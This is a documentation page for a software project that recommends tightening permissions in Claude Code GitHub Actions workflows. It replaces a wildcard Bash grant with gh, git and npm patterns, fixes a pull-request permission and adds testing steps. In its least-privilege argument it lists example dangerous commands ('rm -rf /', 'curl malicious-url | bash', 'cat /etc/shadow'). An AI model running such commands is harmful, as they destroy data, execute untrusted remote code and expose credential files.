Claude Code Workflows - Recommended Fixes

Date: 2025-12-04
Priority: Medium
Impact: Security & Functionality Improvements

Summary

After analyzing the Claude Code GitHub Actions workflows, we identified:

  • 1 permission mismatch that may cause failures
  • 2 workflows with overly permissive security settings
  • 0 authentication bugs (everything works as designed!)

All issues are minor and the workflows are functional, but these improvements will enhance security and reliability.

Issue 1: Permission Mismatch in Code Review Workflow

File: .github/workflows/claude-code-review.yml
Severity: Medium (May cause workflow failures)
Status: Needs fix

Problem

The workflow grants Claude the ability to comment on PRs but doesn’t provide the required GitHub permissions:

permissions:
  contents: read
  pull-requests: read    # ← Read-only!
  issues: read
  id-token: write

# But allows:
claude_args: '--allowed-tools "...Bash(gh pr comment:*)..."'

When Claude attempts to run gh pr comment, the GitHub API will return 403 Forbidden because the workflow token only has pull-requests: read permission.

Impact

  • Code review workflow may fail when attempting to post comments
  • No security risk (just doesn’t work)
  • Users will see error messages in workflow logs

Solution

Option A: Grant Write Permission (Recommended)

permissions:
  contents: read
  pull-requests: write   # ← Change to write
  issues: read
  id-token: write

Option B: Remove Commenting Ability

claude_args: '--allowed-tools "Bash(gh issue view:*),Bash(gh search:*),Bash(gh issue list:*),Bash(gh pr diff:*),Bash(gh pr view:*),Bash(gh pr list:*)"'
# Removed: Bash(gh pr comment:*)

Recommendation: Use Option A. Code reviews are more valuable when Claude can post findings as PR comments.

Implementation 

# Edit the file
code .github/workflows/claude-code-review.yml

# Change line 29 from:
#   pull-requests: read
# To:
#   pull-requests: write

# Commit the change
git add .github/workflows/claude-code-review.yml
git commit -m "fix(workflows): grant pull-requests write permission to claude-code-review

The claude-code-review workflow allows Claude to comment on PRs via
gh pr comment but only had pull-requests: read permission, which would
cause 403 Forbidden errors. Granting write permission fixes this.

Resolves permission mismatch identified in authentication analysis."

git push

Issue 2: Overly Permissive Bash Access

Files:

  • .github/workflows/claude-auto-fix.yml
  • .github/workflows/claude-clarification-response.yml

Severity: Low (Security best practice)
Status: Recommended improvement

Problem

Both workflows grant unrestricted Bash command execution:

claude_args: '--allowed-tools "Bash(*),Read,Write,Edit,Glob,Grep,Task"'
# ↑ Bash(*) allows ANY shell command!

This violates the principle of least privilege. While Claude is designed to be safe, if Claude were compromised or made an error, it could execute dangerous commands like:

  • rm -rf / (destructive file operations)
  • curl malicious-url | bash (remote code execution)
  • cat /etc/shadow (read sensitive system files)

Impact

  • Security risk if Claude’s behavior is manipulated
  • Harder to audit what commands Claude is allowed to run
  • No current functional issues (workflows work fine)

Solution

Restrict Bash access to specific command patterns:

# Change from:
claude_args: '--allowed-tools "Bash(*),Read,Write,Edit,Glob,Grep,Task"'

# To:
claude_args: '--allowed-tools "Bash(gh *),Bash(git *),Bash(npm test),Bash(npm run *),Read,Write,Edit,Glob,Grep,Task"'

This allows:

  • gh * - All GitHub CLI commands (needed for PRs, issues, comments)
  • git * - All git commands (needed for branches, commits)
  • npm test - Run tests (needed to verify fixes)
  • npm run * - Run npm scripts (needed for builds, linting)

This blocks:

  • File system operations (rm, mv, cp)
  • Network operations (curl, wget)
  • System commands (sudo, ps, kill)

Implementation

For claude-auto-fix.yml:

# Edit the file
code .github/workflows/claude-auto-fix.yml

# Find line ~50 (in the Claude Auto-Fix step)
# Change:
#   claude_args: '--allowed-tools "Bash(*),Read,Write,Edit,Glob,Grep,Task"'
# To:
#   claude_args: '--allowed-tools "Bash(gh *),Bash(git *),Bash(npm test),Bash(npm run *),Read,Write,Edit,Glob,Grep,Task"'

For claude-clarification-response.yml:

# Edit the file
code .github/workflows/claude-clarification-response.yml

# Find line ~83 (in the Continue with Claude Fix step)
# Make the same change as above

Commit both changes:

git add .github/workflows/claude-auto-fix.yml .github/workflows/claude-clarification-response.yml

git commit -m "security(workflows): restrict Claude Bash access to specific commands

Replaced overly permissive Bash(*) wildcard with specific command
patterns following principle of least privilege:
- Bash(gh *) for GitHub CLI operations
- Bash(git *) for version control
- Bash(npm test) and Bash(npm run *) for testing/building

This prevents accidental or malicious execution of dangerous commands
while maintaining all required functionality.

Implements security recommendation from authentication analysis."

git push

Issue 3: Missing Tool Permission Documentation

Files: All workflow files
Severity: Low (Maintenance)
Status: Optional improvement

Problem

The claude_args configuration lacks inline documentation explaining why specific tools are granted. This makes it harder for future maintainers to understand the security model.

Solution

Add comments documenting tool permissions:

# Tool Permissions Explanation:
# - Bash(gh *): Required for GitHub CLI operations (PRs, issues, comments)
# - Bash(git *): Required for version control operations (branches, commits)
# - Bash(npm test): Required for running tests to verify fixes
# - Bash(npm run *): Required for build and lint operations
# - Read,Write,Edit: Required for file modifications
# - Glob,Grep: Required for code analysis and search
# - Task: Required for multi-step workflows
claude_args: '--allowed-tools "Bash(gh *),Bash(git *),Bash(npm test),Bash(npm run *),Read,Write,Edit,Glob,Grep,Task"'

Implementation

Add these comments to all workflows that use claude_args. This is a documentation-only change and doesn’t affect functionality.

Testing Plan

After implementing fixes, verify:

1. Test Code Review Workflow 

# Create a test PR
git checkout -b test/code-review-permissions
echo "# Test PR" >> test-file.md
git add test-file.md
git commit -m "test: verify code review permissions"
git push -u origin test/code-review-permissions
gh pr create --title "Test: Code Review Permissions" --body "Testing Claude code review workflow"

# Trigger Claude review (workflow should auto-trigger on PR creation)
# Or manually trigger with @claude mention in PR comment

# Verify Claude can post comments
gh pr view --comments

2. Test Auto-Fix Workflow 

# Create a test issue
gh issue create --title "Test: Auto-fix permissions" --body "Testing restricted Bash permissions" --label "bug"

# Add auto-fix label
gh issue list --label "bug" --json number --jq '.[0].number' | xargs -I {} gh issue edit {} --add-label "auto-fix"

# Monitor workflow
gh run watch

# Verify workflow completes successfully
gh run list --workflow=claude-auto-fix.yml --limit 1

# Verify Claude can still run required commands
# Check logs for successful gh/git/npm commands

3. Verify No Broken Functionality

After deploying fixes:

  • Code review workflow can post comments on PRs
  • Auto-fix workflow can create PRs
  • Auto-fix workflow can comment on issues
  • Clarification workflow responds to user input
  • All required commands (gh, git, npm) still work
  • No unauthorized commands can be executed

Rollback Plan

If any issues occur after deployment:

# Revert to previous commit
git revert HEAD

# Or revert specific files
git checkout HEAD~1 .github/workflows/claude-code-review.yml
git checkout HEAD~1 .github/workflows/claude-auto-fix.yml
git checkout HEAD~1 .github/workflows/claude-clarification-response.yml

# Commit and push
git commit -m "revert: rollback Claude workflow permission changes"
git push

Timeline

Recommended Implementation:

  • Issue 1 (Permission mismatch): Implement immediately (may cause failures)
  • Issue 2 (Bash permissions): Implement in next maintenance window
  • Issue 3 (Documentation): Implement when convenient

Total Effort: ~30 minutes

  • File edits: 10 minutes
  • Testing: 15 minutes
  • Documentation: 5 minutes

Additional Recommendations

1. Add CI/CD Integration (Optional Enhancement)

If you want Claude to analyze CI/CD failures, add to workflows:

permissions:
  actions: read        # ← Add this

steps:
  - uses: anthropics/claude-code-action@v1
    with:
      additional_permissions: |
        actions: read   # ← Add this

2. Monitor Workflow Logs

Set up monitoring for authentication issues:

# Add to cron or CI/CD
gh run list --workflow=claude-auto-fix.yml --status failure --limit 10 | grep -i "auth\|permission"

3. Document in CLAUDE.md

Update project documentation to reference these analyses:

## GitHub Actions & Claude Integration

For detailed information about Claude Code workflows:
- [Authentication Analysis](./docs/github-actions/claude-code-authentication-analysis.md)
- [Quick Reference](./docs/github-actions/claude-code-quick-reference.md)
- [Recommended Fixes](./docs/github-actions/recommended-fixes.md)

Conclusion

All recommended fixes are low-risk, high-value improvements:

Benefits:

  • Improved security (principle of least privilege)
  • Better maintainability (documented permissions)
  • Fixed potential bug (PR commenting)

No Breaking Changes:

  • All workflows remain functional
  • No API changes
  • No user-facing impact

Status: Ready for implementation

Questions? See:

Back to top

Momentum LMS © 2025. Distributed under the MIT license.